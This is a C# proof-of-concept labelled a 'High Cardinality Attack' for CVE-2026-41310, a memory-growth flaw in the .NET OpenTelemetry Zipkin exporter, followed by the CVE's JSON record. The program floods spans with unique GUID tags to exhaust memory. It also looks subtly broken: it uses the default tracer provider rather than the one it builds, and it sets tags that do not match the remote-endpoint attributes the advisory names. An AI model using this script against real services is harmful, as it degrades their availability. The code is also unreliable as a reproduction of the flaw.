CVE-2026-41310

using OpenTelemetry; using OpenTelemetry.Trace; using System; using System.Threading.Tasks; namespace Poc { public class ZipkinMemoryLeakPoc { public static async Task Main(string[] args) { // Initialize tracer with Zipkin Exporter (Vulnerable version <= 1.15.2) using var tracerProvider = Sdk.CreateTracerProviderBuilder() .AddZipkinExporter(o => { o.Endpoint = new Uri("http://localhost:9411/api/v2/spans"); }) .Build(); var tracer = TracerProvider.Default.GetTracer("PocApp"); Console.WriteLine("Starting High Cardinality Attack..."); // Simulate an attack by sending requests with unique attributes for (int i = 0; i < 100000; i++) { using var span = tracer.StartActiveSpan("RequestSpan"); // Generate high-cardinality data to fill the cache string uniqueId = Guid.NewGuid().ToString(); span.SetTag("http.user_agent", uniqueId); span.SetTag("http.url", $"http://example.com/{uniqueId}"); // Simulate processing delay await Task.Delay(5); if (i % 1000 == 0) { Console.WriteLine($"Sent {i} requests. Monitor memory growth."); } } } } }

{"cve": {"id": "CVE-2026-41310", "sourceIdentifier": "[email protected]", "published": "2026-05-06T22:16:25.643", "lastModified": "2026-05-11T14:40:45.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenTelemetry.Exporter.Zipkin is the .NET Zipkin exporter for OpenTelemetry. In versions 1.15.2 and earlier, the Zipkin exporter remote endpoint cache accepts unbounded key growth derived from span attributes. In high-cardinality scenarios, a process using Zipkin export for client or producer spans could experience avoidable memory growth under sustained unique remote endpoint values, increasing process memory usage over time and degrading availability. This issue is fixed in version 1.15.3, which introduces a bounded, thread-safe LRU cache for remote endpoints with a fixed maximum size."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opentelemetry:opentelemetry.exporter.zipkin:*:*:*:*:*:.net:*:*", "versionEndExcluding": "1.15.3", "matchCriteriaId": "88FCC724-04D2-4E6A-9E07-8375E9E862DB"}]}]}], "references": [{"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/7081", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-88hf-wf7h-7w4m", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}